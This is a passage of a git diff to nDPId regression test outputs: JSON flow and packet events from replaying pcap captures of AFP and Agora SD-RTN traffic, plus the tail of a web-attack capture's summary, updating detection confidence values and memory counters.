Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00579{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","packets-captured":9374,"packets-processed":9374,"total-skipped-flows":0,"total-l4-payload-len":4091888,"total-not-detected-flows":0,"total-guessed-flows":639,"total-detected-flows":22,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":661,"total-idle-flows":661,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":3970,"global_ts_msec":1499348099366} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 9374/9374 @@ -3976,9 +3976,9 @@ ~~ total active/idle flows...: 661/661 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6845697 bytes -~~ total memory freed........: 6845697 bytes -~~ total allocations/frees...: 130238/130238 +~~ total memory allocated....: 6979331 bytes +~~ total memory freed........: 6979331 bytes +~~ total allocations/frees...: 133000/133000 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 468 chars ~~ json string max len.......: 1123 chars diff --git a/test/results/afp.pcap.out b/test/results/afp.pcap.out index 47ea024d0..84bcead8d 100644 --- a/test/results/afp.pcap.out +++ b/test/results/afp.pcap.out @@ -2,10 +2,10 @@ 00543{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"afp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1643275951277} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"afp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643275951277,"flow_last_seen":1643275951277,"flow_idle_time":7580000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":1,"thread_ts_msec":1643275951277,"l3_proto":"ip4","src_ip":"192.168.27.57","dst_ip":"192.168.27.139","src_port":64987,"dst_port":548,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"afp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1643275951277,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1643275951277,"pkt":"ABxCVgfWYPgdrn1ECABFAABKAABAAEAGgpnAqBs5wKgbi\/3bAiR+nkVXU19RioAYCHEmJgAAAQEICtTtV\/gAQrf\/AAIixgAAAAAAAAAGAAAAABEAAAIOHA=="} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"afp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643275951277,"flow_last_seen":1643275951277,"flow_idle_time":7580000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":1,"thread_ts_msec":1643275951277,"l3_proto":"ip4","src_ip":"192.168.27.57","dst_ip":"192.168.27.139","src_port":64987,"dst_port":548,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"AFP","breed":"Acceptable","category":"DataTransfer"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"afp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643275951277,"flow_last_seen":1643275951277,"flow_idle_time":7580000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":1,"thread_ts_msec":1643275951277,"l3_proto":"ip4","src_ip":"192.168.27.57","dst_ip":"192.168.27.139","src_port":64987,"dst_port":548,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"AFP","breed":"Acceptable","category":"DataTransfer"}} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"afp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1643275951277,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1643275951277,"pkt":"YPgdrn1EABxCVgfWCABFAAA038RAAEAGourAqBuLwKgbOQIk\/dtTX1GKfp5FbYAQVeK4OwAAAQEICgBCwzzU7Vf4"} 00531{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"afp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1643275951277,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":116,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":116,"pkt_l4_len":82,"thread_ts_msec":1643275951277,"pkt":"YPgdrn1EABxCVgfWCABFAABm38VAAEAGorfAqBuLwKgbOQIk\/dtTX1GKfp5FbYAYVeK4bQAAAQEICgBCwzzU7Vf4AQIixgAAAAAAAAAiAAAAAA4cx5MnnCmFIy+AAAAAAAAACVyxcAAAAAALpMeAAAAAEAA="} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"afp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1643275951277,"flow_last_seen":1643275952364,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":10,"midstream":1,"thread_ts_msec":1643275952364,"l3_proto":"ip4","src_ip":"192.168.27.57","dst_ip":"192.168.27.139","src_port":64987,"dst_port":548,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AFP","breed":"Acceptable","category":"DataTransfer"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"afp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1643275951277,"flow_last_seen":1643275952364,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":10,"midstream":1,"thread_ts_msec":1643275952364,"l3_proto":"ip4","src_ip":"192.168.27.57","dst_ip":"192.168.27.139","src_port":64987,"dst_port":548,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AFP","breed":"Acceptable","category":"DataTransfer"}} 00550{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":16,"source":"afp.pcap","alias":"nDPId-test","packets-captured":16,"packets-processed":16,"total-skipped-flows":0,"total-l4-payload-len":162,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1643275952364} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 16/16 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869907 bytes -~~ total memory freed........: 5869907 bytes -~~ total allocations/frees...: 118130/118130 +~~ total memory allocated....: 6003541 bytes +~~ total memory freed........: 6003541 bytes +~~ total allocations/frees...: 120892/120892 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 459 chars ~~ json string max len.......: 686 chars diff --git a/test/results/agora-sd-rtn.pcap.out b/test/results/agora-sd-rtn.pcap.out index 24745af9a..a667cfb96 100644 --- a/test/results/agora-sd-rtn.pcap.out +++ b/test/results/agora-sd-rtn.pcap.out @@ -2,165 +2,165 @@ 00552{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1649093494350} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649093494350,"flow_last_seen":1649093494350,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649093494350,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":35778,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00753{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1649093494350,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649093494350,"pkt":"eJS0JASgYDjgxTWgCABFoAEG97pAAD8RrNTAqAJkF\/i6s4vCH8IA8rYwAFo4TAAAIQAAAAAABFNOSQAcADIzLTI0OC0xODYtMTc5LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAJfnTudXVvVf7BhRNFQtkmabzFsc4YGcbhGqIyaMUEFFQUQEAEFFU0dQVUJTQQAEpZnsPkMzYe4wgqr+jD6KkFsekH5j6BojNRIPCbkPdUaS4xdQKYVOSVvbHOo64z+26LzM8IhE1k5P6pySRtqNMEtFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} -00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649093494350,"flow_last_seen":1649093494350,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649093494350,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":35778,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649093494350,"flow_last_seen":1649093494350,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649093494350,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":35778,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00753{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1649093494350,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649093494350,"pkt":"eJS0JASgYDjgxTWgCABFoAEG97tAAD8RrNPAqAJkF\/i6s4vCH8IA8rYwAFo4TAAAIQAAAAAABFNOSQAcADIzLTI0OC0xODYtMTc5LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAJfnTudXVvVf7BhRNFQtkmabzFsc4YGcbhGqIyaMUEFFQUQEAEFFU0dQVUJTQQAEpZnsPkMzYe4wgqr+jD6KkFsekH5j6BojNRIPCbkPdUaS4xdQKYVOSVvbHOo64z+26LzM8IhE1k5P6pySRtqNMEtFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 00753{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1649093494350,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649093494350,"pkt":"eJS0JASgYDjgxTWgCABFoAEG97xAAD8RrNLAqAJkF\/i6s4vCH8IA8rYwAFo4TAAAIQAAAAAABFNOSQAcADIzLTI0OC0xODYtMTc5LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAJfnTudXVvVf7BhRNFQtkmabzFsc4YGcbhGqIyaMUEFFQUQEAEFFU0dQVUJTQQAEpZnsPkMzYe4wgqr+jD6KkFsekH5j6BojNRIPCbkPdUaS4xdQKYVOSVvbHOo64z+26LzM8IhE1k5P6pySRtqNMEtFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649093494644,"flow_last_seen":1649093494644,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649093494644,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"104.166.161.75","src_port":35778,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00756{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1649093494644,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649093494644,"pkt":"eJS0JASgYDjgxTWgCABFoAEGH0RAAD8RTgXAqAJkaKahS4vCH8IA8mZgACuSLAAAIQAAAAAABFNOSQAcADEwNC0xNjYtMTYxLTc1LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAJfn07LXEa+z6T\/E9ZYq7dujf0mTIUERohITz4bJ+UFFQUQEAEFFU0dQVUJTQQAEJrOqRoL2C8mDJCug2GRL7DZEeLh\/DiKPC8U53YevJ1St97\/n1O3WVlHR7Qa7szYRugw02wmWmX9ymFGjw8kjJ0tFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649093494644,"flow_last_seen":1649093494644,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649093494644,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"104.166.161.75","src_port":35778,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649093494644,"flow_last_seen":1649093494644,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649093494644,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"104.166.161.75","src_port":35778,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00756{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1649093494645,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649093494645,"pkt":"eJS0JASgYDjgxTWgCABFoAEGH0VAAD8RTgTAqAJkaKahS4vCH8IA8mZgACuSLAAAIQAAAAAABFNOSQAcADEwNC0xNjYtMTYxLTc1LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAJfn07LXEa+z6T\/E9ZYq7dujf0mTIUERohITz4bJ+UFFQUQEAEFFU0dQVUJTQQAEJrOqRoL2C8mDJCug2GRL7DZEeLh\/DiKPC8U53YevJ1St97\/n1O3WVlHR7Qa7szYRugw02wmWmX9ymFGjw8kjJ0tFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 00756{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1649093494645,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649093494645,"pkt":"eJS0JASgYDjgxTWgCABFoAEGH0ZAAD8RTgPAqAJkaKahS4vCH8IA8mZgACuSLAAAIQAAAAAABFNOSQAcADEwNC0xNjYtMTYxLTc1LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAJfn07LXEa+z6T\/E9ZYq7dujf0mTIUERohITz4bJ+UFFQUQEAEFFU0dQVUJTQQAEJrOqRoL2C8mDJCug2GRL7DZEeLh\/DiKPC8U53YevJ1St97\/n1O3WVlHR7Qa7szYRugw02wmWmX9ymFGjw8kjJ0tFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649093570648,"flow_last_seen":1649093570648,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649093570648,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"104.166.161.75","src_port":44131,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00755{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1649093570648,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649093570648,"pkt":"eJS0JASgYDjgxTWgCABFoAEGJH1AAD8RSMzAqAJkaKahS6xjH8IA8k05ANAoVwAAIQAAAAAABFNOSQAcADEwNC0xNjYtMTYxLTc1LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAJgzwLO118m5jESf7QcIh4cU1PAqig4J5CIcJJMIfUFFQUQEAEFFU0dQVUJTQQAE+h\/883r3ClVOi4mwokX05oI0DTLyHRc+Mg2zHhwRMHf\/CFZX2CC3hDi1u5H1Ke3ya+pJgSnx8FOJ6Sw76hdLj0tFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649093570648,"flow_last_seen":1649093570648,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649093570648,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"104.166.161.75","src_port":44131,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649093570648,"flow_last_seen":1649093570648,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649093570648,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"104.166.161.75","src_port":44131,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00755{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1649093570648,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649093570648,"pkt":"eJS0JASgYDjgxTWgCABFoAEGJH5AAD8RSMvAqAJkaKahS6xjH8IA8k05ANAoVwAAIQAAAAAABFNOSQAcADEwNC0xNjYtMTYxLTc1LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAJgzwLO118m5jESf7QcIh4cU1PAqig4J5CIcJJMIfUFFQUQEAEFFU0dQVUJTQQAE+h\/883r3ClVOi4mwokX05oI0DTLyHRc+Mg2zHhwRMHf\/CFZX2CC3hDi1u5H1Ke3ya+pJgSnx8FOJ6Sw76hdLj0tFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 00755{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1649093570648,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649093570648,"pkt":"eJS0JASgYDjgxTWgCABFoAEGJH9AAD8RSMrAqAJkaKahS6xjH8IA8k05ANAoVwAAIQAAAAAABFNOSQAcADEwNC0xNjYtMTYxLTc1LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAJgzwLO118m5jESf7QcIh4cU1PAqig4J5CIcJJMIfUFFQUQEAEFFU0dQVUJTQQAE+h\/883r3ClVOi4mwokX05oI0DTLyHRc+Mg2zHhwRMHf\/CFZX2CC3hDi1u5H1Ke3ya+pJgSnx8FOJ6Sw76hdLj0tFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649093575787,"flow_last_seen":1649093575787,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649093575787,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"104.166.161.19","src_port":44131,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00754{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1649093575787,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649093575787,"pkt":"eJS0JASgYDjgxTWgCABFoAEGb9BAAD8R\/bDAqAJkaKahE6xjH8IA8jq3ADeIqAAAIQAAAAAABFNOSQAcADEwNC0xNjYtMTYxLTE5LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAJg4GW0AOb4miWYrD79V3dp03Avt7TH5wg+CXWI7wUFFQUQEAEFFU0dQVUJTQQAEjCK+WoT2o97rehkI3TG55IXFgAabPHd4hAmu5nn67YI3raymU5Wjq30alJlITK96tt+JtMNgvpxcYqAphTU6mUtFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649093575787,"flow_last_seen":1649093575787,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649093575787,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"104.166.161.19","src_port":44131,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649093575787,"flow_last_seen":1649093575787,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649093575787,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"104.166.161.19","src_port":44131,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 